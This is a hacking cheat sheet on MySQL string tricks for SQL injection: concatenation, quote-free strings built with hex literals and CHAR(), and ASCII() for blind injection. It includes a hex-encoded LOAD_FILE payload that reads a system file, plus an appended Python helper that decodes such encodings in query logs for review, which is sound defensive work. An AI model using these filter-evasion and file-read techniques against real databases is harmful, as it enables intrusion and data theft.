====== Hacking - SQL Injection - MySQL - String Operations ======

String-related operations are useful for building injections that do not use any quotes, for bypassing other blacklisting, and for determining the back-end database.

===== String Concatenation =====

  ||

  SELECT login || '-' || password FROM members

**NOTE:** About MySQL **"||"**: this works only if MySQL is running in ANSI mode; otherwise MySQL treats it as a `logical operator` and returns 0.

A better way to do it is to use the **CONCAT()** function in MySQL:

  CONCAT(str1, str2, str3, ...)    (M)   /* Concatenate supplied strings. */

  SELECT CONCAT(login, password) FROM members

----

===== Strings without Quotes =====

These are some direct ways of using strings, but it is always possible to use **CHAR()** to generate a string without quotes.

  0x457578    /* Hex representation of string. */

  SELECT 0x457578    /* This will be selected as a string in MySQL. */

An easy way to generate hex representations of strings in MySQL:

  SELECT CONCAT('0x',HEX('c:\\boot.ini'))

  SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))    /* This will return 'KLM'. */

Hex-based SQL injection sample:

  SELECT LOAD_FILE(0x633A5C626F6F742E696E69)    /* This will show the content of c:\boot.ini */

----

===== String Modification & Related =====

Return the ASCII character value of the leftmost character.

  ASCII()

  SELECT ASCII('a')

A must-have function for blind SQL injections.

----

Convert an integer to its ASCII character.

  CHAR()

  SELECT CHAR(64)
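
Added example (not part of the original page): a Python helper a log reviewer could use to make the quote-free encodings from the "Strings without Quotes" section visible, by rewriting MySQL hex literals and CHAR() calls as quoted literals and folding CONCAT() calls whose arguments are all literals. The names ''normalize'', ''review'' and ''SAMPLE_LOG'' are hypothetical, and the sample entries are constructed from this page's own queries.

```python
import re

# The two quote-free string encodings discussed on this page:
# MySQL hex literals (0x...) and CHAR(n[,n...]) calls.
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-fA-F]{2})+)\b")
CHAR_CALL = re.compile(r"\bCHAR\s*\(\s*(\d{1,3}(?:\s*,\s*\d{1,3})*)\s*\)", re.I)
LITERAL = r"'(?:[^'\\]|\\.)*'"  # a single-quoted literal with backslash escapes
CONCAT_CALL = re.compile(r"\bCONCAT\s*\(\s*(%s(?:\s*,\s*%s)*)\s*\)" % (LITERAL, LITERAL), re.I)


def _quote(raw):
    """Render bytes as a MySQL string literal, or None if not printable ASCII."""
    if not raw or any(b < 0x20 or b > 0x7E for b in raw):
        return None
    text = raw.decode("ascii").replace("\\", "\\\\").replace("'", "\\'")
    return "'" + text + "'"


def normalize(sql):
    """Rewrite hex literals and CHAR() calls as quoted literals, then fold CONCAT()."""
    def hex_sub(m):
        return _quote(bytes.fromhex(m.group(1))) or m.group(0)

    def char_sub(m):
        codes = [int(n) for n in m.group(1).split(",")]
        if any(c > 255 for c in codes):
            return m.group(0)  # outside one byte: leave untouched
        return _quote(bytes(codes)) or m.group(0)

    def concat_sub(m):
        parts = re.findall(LITERAL, m.group(1))
        return "'" + "".join(p[1:-1] for p in parts) + "'"

    out = CHAR_CALL.sub(char_sub, HEX_LITERAL.sub(hex_sub, sql))
    return CONCAT_CALL.sub(concat_sub, out)


SAMPLE_LOG = [  # constructed entries, taken from the queries shown on this page
    "SELECT LOAD_FILE(0x633A5C626F6F742E696E69)",
    "SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))",
    "SELECT CONCAT(login, password) FROM members",
]


def review(lines):
    """Return (original, normalized) for every entry that hid a string."""
    return [(line, normalize(line)) for line in lines if normalize(line) != line]
```

A hex literal used in a numeric context is rewritten too when its bytes are printable, so the output is a reviewing aid rather than an equivalent query.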